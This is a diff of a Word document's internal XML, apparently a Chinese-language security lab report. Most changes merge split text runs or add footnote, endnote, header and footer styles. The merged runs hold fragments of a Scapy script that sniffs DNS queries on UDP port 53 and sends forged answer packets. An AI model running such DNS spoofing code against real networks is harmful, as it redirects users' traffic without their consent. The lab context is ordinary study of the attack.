-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>DNSRR(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>        Addsec = DNSRR(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -2925,20 +2557,8 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>        DNSpkt=</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>DNS(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>        DNSpkt=DNS(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -3342,86 +2962,8 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>spoofpkt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>IPpkt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>UDPpkt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>DNSpkt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>        spoofpkt = IPpkt/UDPpkt/DNSpkt</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3445,29 +2987,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>        send(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>spoofpkt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>        send(spoofpkt)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3492,20 +3012,8 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>pkt=</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>sniff(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>pkt=sniff(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -3524,29 +3032,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>=’</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>udp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t> </w:t>
+        <w:t>=’udp </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3566,29 +3052,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>dst</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t> port </w:t>
+        <w:t> dst port </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3628,29 +3092,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>spoof_dns</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>=spoof_dns)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3749,6 +3191,44 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -4205,6 +3685,73 @@
     <w:semiHidden/>
     <w:rsid w:val="008C4023"/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="a6">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="a7"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B408DE"/>
+    <w:pPr>
+      <w:pBdr>
+        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+      </w:pBdr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4153"/>
+        <w:tab w:val="right" w:pos="8306"/>
+      </w:tabs>
+      <w:snapToGrid w:val="0"/>
+      <w:jc w:val="center"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="a7">
+    <w:name w:val="页眉 字符"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a6"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00B408DE"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="minorEastAsia" w:cs="Times New Roman (正文 CS 字体)"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a8">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="a9"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B408DE"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4153"/>
+        <w:tab w:val="right" w:pos="8306"/>
+      </w:tabs>
+      <w:snapToGrid w:val="0"/>
+      <w:jc w:val="left"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="a9">
+    <w:name w:val="页脚 字符"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a8"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00B408DE"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="minorEastAsia" w:cs="Times New Roman (正文 CS 字体)"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
